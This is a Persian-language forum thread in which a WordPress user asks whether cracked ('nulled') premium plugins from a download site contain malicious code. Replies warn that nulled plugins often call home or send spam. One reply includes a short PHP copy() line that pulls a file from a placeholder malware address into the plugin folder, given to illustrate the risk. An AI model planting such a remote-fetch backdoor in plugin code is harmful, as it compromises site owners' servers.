Kamali

تأیید افزونه های غیررایگان برخی سایتها

11 پست در این موضوع قرار دارد

با سلام و احترام .

بنده میخواستم بدونم آیا افزونه های غیررایگان خارجی که مثلا در سایت بیست اسکریپت به صورت رایگان قرار داده شده ، قابل اطمینانه ؟ آیا کد مخربی ، چیزی نداره ؟

چجوری میشه تست کرد که ببینیم افزونه ای که دانلود کردیم ، سالمه ؟

به اشتراک گذاری این پست


لینک به پست

سلام

به هیچ عنوان قابل اعتماد نیست، از این جهت خیال‌تون راحت!

به اشتراک گذاری این پست


لینک به پست
در 4 دقیقه قبل، مهدی گفته است :

سلام

به هیچ عنوان قابل اعتماد نیست، از این جهت خیال‌تون راحت!

میشه بیشتر توضیح بدید ؟ یعنی کد مخرب داخل افزونه ها جاسازی می کنن ؟ آخه این سایت میشه گفت سایت پربازدید و معروفیه . یعنی میاد اینجوری خودشو خراب می کنه ؟ راهی هست که من بتونم تست کنم که ببینم کد مخرب داخل افزونه ها هست یا نه ؟

به اشتراک گذاری این پست


لینک به پست

سلام

اگر مسلط به برنامه نویسی هستید، تک تک فایلها رو باز کنید و بخونید

به اشتراک گذاری این پست


لینک به پست
در 2 ساعت قبل، Ali گفته است :

سلام

اگر مسلط به برنامه نویسی هستید، تک تک فایلها رو باز کنید و بخونید

مرسی از پاسختون ، ولی اگه مسلط به برنامه نویسی بودم ، نیازی به دانلود افزونه نداشتم ، خودم یه افزونه می نوشتم واسه خودم .

آقای مهدی فقط اومدن و گفتن به هیچ عنوان قابل اعتماد نیست ، ولی دیگه هیچ راهنمایی نکردن که چه جوری میشه از این موضوع مطمئن شد ؟!!!

چشم بسته که نمیشه به همه چی مشکوک بود ! اگه اینجوری بود ، الان اینهمه نرم افزار کرک شده وجود داره در ایران ، پس باید به همه ی اونها هم شک داشت و گفت همشون مخرب هستن .

این سایت که احتمالا شما هم میشناسیدش ، برخی افزونه های غیررایگان خارجی رو ، یه جورایی کرک میکنه و رایگان میزاره واسه دانلود . من میخوام مطمئن شم که ببینم آیا افزونه هاش دارای کد مخرب هستن یا نه ؟ روشی وجود نداره که بشه این موضوع رو تست کنم ؟

ویرایش شده در توسط Kamali

به اشتراک گذاری این پست


لینک به پست
در ۱ ساعت قبل، Kamali گفته است :

مرسی از پاسختون ، ولی اگه مسلط به برنامه نویسی بودم ، نیازی به دانلود افزونه نداشتم ، خودم یه افزونه می نوشتم واسه خودم .

آقای مهدی فقط اومدن و گفتن به هیچ عنوان قابل اعتماد نیست ، ولی دیگه هیچ راهنمایی نکردن که چه جوری میشه از این موضوع مطمئن شد ؟!!!

چشم بسته که نمیشه به همه چی مشکوک بود ! اگه اینجوری بود ، الان اینهمه نرم افزار کرک شده وجود داره در ایران ، پس باید به همه ی اونها هم شک داشت و گفت همشون مخرب هستن .

این سایت که احتمالا شما هم میشناسیدش ، برخی افزونه های غیررایگان خارجی رو ، یه جورایی کرک میکنه و رایگان میزاره واسه دانلود . من میخوام مطمئن شم که ببینم آیا افزونه هاش دارای کد مخرب هستن یا نه ؟ روشی وجود نداره که بشه این موضوع رو تست کنم ؟

سلام

 

آیا این سایتی که میگید افزونه رو میگیره کرک میکنه خودش این کار رو میکنه ؟

تقریباً تمام سایت های فارسی حوزه وب میان از جا های دیگه بر میدارن

یعنی یکی دیگه نال کرده ، حالا یا کد مخرب گذاشته یا نذاشته رایگان میده بیرون و سایت های فارسی هم از اونها بر میدارن و کپی رایت خودشونو میزنن تنش (حالا یا کد مخرب میزارن یا نمیزارن ) رایگان میزارن توی سایتشون.

 

مثلا همین سایتی که گفتید ، اومده  یکی از پلاگین های وابسته به ووکامرس که حدود 200 دلار قیمت داره رو رایگاه گذاشته

آیا 800 هزار پول داده و بعد رایگان در اختیار عموم قرار داده ؟

نه ، از یه سایت دیگه نال شده برداشته

به اشتراک گذاری این پست


لینک به پست
در 19 دقیقه قبل، Fara-MarZ گفته است :

سلام

 

آیا این سایتی که میگید افزونه رو میگیره کرک میکنه خودش این کار رو میکنه ؟

تقریباً تمام سایت های فارسی حوزه وب میان از جا های دیگه بر میدارن

یعنی یکی دیگه نال کرده ، حالا یا کد مخرب گذاشته یا نذاشته رایگان میده بیرون و سایت های فارسی هم از اونها بر میدارن و کپی رایت خودشونو میزنن تنش (حالا یا کد مخرب میزارن یا نمیزارن ) رایگان میزارن توی سایتشون.

 

مثلا همین سایتی که گفتید ، اومده  یکی از پلاگین های وابسته به ووکامرس که حدود 200 دلار قیمت داره رو رایگاه گذاشته

آیا 800 هزار پول داده و بعد رایگان در اختیار عموم قرار داده ؟

نه ، از یه سایت دیگه نال شده برداشته

ممنون از توضیحات بسیار خوبتون . کاملا درسته و حرفتون منطقیه .

فقط یه چیز !!! آیا همه ی افزونه های کرک شده دارای کد مخرب هستن ؟ یعنی این سایت ، اگه به فرمایش شما از جای دیگه هم برمیداره ، آیا قبلش یه تست نمیکنه که ببینه این افزونه ای که کرک شده ، کد مخرب داره یا نه ؟

دقیقا مثله بحث کرک نرم افزارها هست . ممکنه یه نرم افزار ، چندین کرک داشته باشه و فقط یکی از اون کرک ها مخرب و ویروس باشه و مابقی کرک ها سالم باشن .

بحث منم دقیقا همینجاست که میخوام مطمئن شم که آیا افزونه ای که میخوام دانلود کنم مشکل داره یا نه ؟

من یه افزونه ی پست میهمان از این سایت میخوام بگیرم به نام Accesspress Anonymous Post ، هیچ راهی نیست که بتونم تستش کنم ، قبل از اینکه ازش استفاده کنم ؟

به اشتراک گذاری این پست


لینک به پست
در 3 دقیقه قبل، Kamali گفته است :

ممنون از توضیحات بسیار خوبتون . کاملا درسته و حرفتون منطقیه .

فقط یه چیز !!! آیا همه ی افزونه های کرک شده دارای کد مخرب هستن ؟ یعنی این سایت ، اگه به فرمایش شما از جای دیگه هم برمیداره ، آیا قبلش یه تست نمیکنه که ببینه این افزونه ای که کرک شده ، کد مخرب داره یا نه ؟

دقیقا مثله بحث کرک نرم افزارها هست . ممکنه یه نرم افزار ، چندین کرک داشته باشه و فقط یکی از اون کرک ها مخرب و ویروس باشه و مابقی کرک ها سالم باشن .

بحث منم دقیقا همینجاست که میخوام مطمئن شم که آیا افزونه ای که میخوام دانلود کنم مشکل داره یا نه ؟

من یه افزونه ی پست میهمان از این سایت میخوام بگیرم به نام Accesspress Anonymous Post ، هیچ راهی نیست که بتونم تستش کنم ، قبل از اینکه ازش استفاده کنم ؟

شاید همه شون نباشن

یا بعضی هاش با امنیتی که بعضی از هاست ها ( مثل خواستن رمز برای آپلود در پنل مدیریت وردپرس) دارن کار نکنن

ولی اون طرف قضیه رو باید دید

 

چندین ماه زحمت و نخوابی و ...  میایی آمار رو میبری بالا

بعد یک شبه تمام

 

برای پست مهمان افزونه های رایگان زیادی هست چرا اون؟

مثلا این خودم دارم استفاده می کنم

https://wordpress.org/plugins/user-submitted-posts/

به اشتراک گذاری این پست


لینک به پست
در ۱ ساعت قبل، Fara-MarZ گفته است :

شاید همه شون نباشن

یا بعضی هاش با امنیتی که بعضی از هاست ها ( مثل خواستن رمز برای آپلود در پنل مدیریت وردپرس) دارن کار نکنن

ولی اون طرف قضیه رو باید دید

 

چندین ماه زحمت و نخوابی و ...  میایی آمار رو میبری بالا

بعد یک شبه تمام

 

برای پست مهمان افزونه های رایگان زیادی هست چرا اون؟

مثلا این خودم دارم استفاده می کنم

https://wordpress.org/plugins/user-submitted-posts/

بنده تمامی افزونه های پست میهمان موجود رو زیر و رو کردم و همگی رو نصب و امکاناتش رو امتحان کردم و همین افزونه ای که اسم بردید رو هم ، قبلا ازش استفاده میکردم و افزونه ی خوبی بود ، ولی متأسفانه الان به کارم نمیاد ، چون در نسخه رایگانش ، امکان ایجاد چند فرم مجزا وجود نداره و فقط میشه یه فرم ایجاد کرد .

افزونه ای که اسم بردم ، واقعا امکاناتش عالیه و تا به حال ، مثله این رو ندیده بودم و به راحتی میشه بی نهایت فرم ، با استایل متعدد و امکانات خیلی عالی ایجاد کرد که کاملا مناسب کار من هست .

بنده این سئوال رو چندین بار پرسیدم ، اگه ممکنه شما که وارد هستید پاسخ بدید . " آیا راهی هست که بشه از وجود ، یا عدم وجود کد مخرب در این افزونه مطمئن شد ؟ "

 

ضمنا درخصوص این قسمت از صحبتتون :

در ۱ ساعت قبل، Fara-MarZ گفته است :

یا بعضی هاش با امنیتی که بعضی از هاست ها ( مثل خواستن رمز برای آپلود در پنل مدیریت وردپرس) دارن کار نکنن

اگه امکان آپلود فایل رو در فرم ایجاد شده ی افزونه ، قرار ندیم که چه جوری کسی میخواد چیزی آپلود کنه روی هاست ؟

 

ویرایش شده در توسط Kamali

به اشتراک گذاری این پست


لینک به پست
در 41 دقیقه قبل، Kamali گفته است :

بنده این سئوال رو چندین بار پرسیدم ، اگه ممکنه شما که وارد هستید پاسخ بدید . " آیا راهی هست که بشه از وجود ، یا عدم وجود کد مخرب در این افزونه مطمئن شد ؟ "

 

متاسفانه جواب اینو نمی دونم

در 42 دقیقه قبل، Kamali گفته است :

اگه امکان آپلود فایل رو در فرم ایجاد شده ی افزونه ، قرار ندیم که چه جوری کسی میخواد چیزی آپلود کنه روی هاست ؟

بلفرض

من میام کد زیر رو در جایی از افزونه قرار میدم

<?php
 copy("آدرس ویروس یا فایل های مخرب", "اسم فایل بعد از کپی");
?>

بعد میام آدرسش رو فراخوانی میکنم

http://site.com/wp-content/plugins/myplugin/nameofmyfile

خب به همین راحتی فایل ویروس یا مخرب وارد هاستتون شد

اگر باور نداری از آدرس یکی یه فایلی رو تو هاست خودت کپی کن

 

( البته این خیلی ابتدایی و راحت هست )

به اشتراک گذاری این پست


لینک به پست

بزارید در ساده ترین حالت ممکن بهتون بگم:

در دنیای وارز(کرک و نال و...)، چندین حالت اتفاق میوفته،

1- افراد میان مثلا بصورت گروهی یک سری نرم افزار رو خریداری میکنن، بعد کرک یا نال میکنن و بعد با هم استفاده میکنن.

2- یک فرد خاص میاد، سایتی رو هک میکنه، افزونه یا محصول خاص رو میگیره، کرک یا نال میکنن و استفاده میکنن.

3- یک محصول بصورت freeware عرضه میشه، میان نال و کرک میکنن و استفاده میکنن.

 

اما چقدر به نظر شما منطقی هست که فردی بیاد و اینهمه وقت بزاره و کرک و نال کنه بدون منفعت شخصی؟

بحث کرک شاید در استفاده خطر کمتری از نال داشته باشه و صدالبته بدون خطر هم نیست. کافیه یک ویروس در کیجن یک نرم افزار باشه و شما بازش کنید و....

اما بحث نال به شدت خطرناک تر هست. تقریبا همه نسخه های نال شده کد مخرب دارن. بعد از اجرا شدن محصول در سرور، یک ایمیل یا یک پینگ یا هر چیزی ارسال میکنن و هکر یا شخص ثالث میاد و کار روی سرور شما شروع میشه که اکثر اینها برای ارسال ایمیل اسپم از سرور شما استفاده میکنن.

این بحث که دانش نال و کرک در جهان(نه تنها ایران) پایین هست و خصوصا ایرانی ها هم به کپی عادت دارن، به شدت استفاده آنلاین از این محصولات خطرناک هست.

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری